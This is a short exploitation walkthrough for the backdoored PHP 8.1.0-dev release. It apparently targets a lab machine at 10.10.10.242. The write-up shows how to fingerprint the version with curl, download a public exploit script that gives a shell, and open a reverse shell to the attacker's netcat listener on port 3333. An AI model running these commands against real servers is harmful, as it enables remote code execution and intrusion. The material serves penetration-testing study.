PHP verion 8.1.0-dev was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.

The original code was restored after the issue was discovered, but then tampered with a second time. The breach would have created a backdoor in any websites that ran the compromised version of PHP, enabling hackers to perform remote code execution on the site.

Identification

1. One of the ways to identify if a website is using PHP 8.1.0-dev, is to make a query using Curl, and print out the headers by identifying the server response

  • curl --head http://10.10.10.242

2. This can also be gotten from BurpSuite, in the server response

Exploitation

Script 1 (PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution)

1. This script automatically exploits user-agentt, and provides a shell (https://www.exploit-db.com/exploits/49933)

  • curl https://www.exploit-db.com/download/49933 -o exploit.py
  • ls -l exploit.py

2. Run it against the vulnerable web site

  • python3 exploit.py
  • http://10.10.10.242/
  • whoami

Script 2 (Reverse Shell)

1. Download the script from (https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py)

2. I named the file as exploit2.py

  • python3 exploit2.py -h

3. Start a listener, in the attacker machine

  • nc -lvp 3333

4. Run the command with the following data

  • python3 exploit2.py http://10.10.10.242/ 10.10.14.6 3333

5. Check the listener, and there should be a connection back

Remedy

Upgrade to a newer version, visit the vendor information for more info

Resources

https://www.exploit-db.com/exploits/49933

https://github.com/flast101/php-8.1.0-dev-backdoor-rce

https://flast101.github.io/php-8.1.0-dev-backdoor-rce/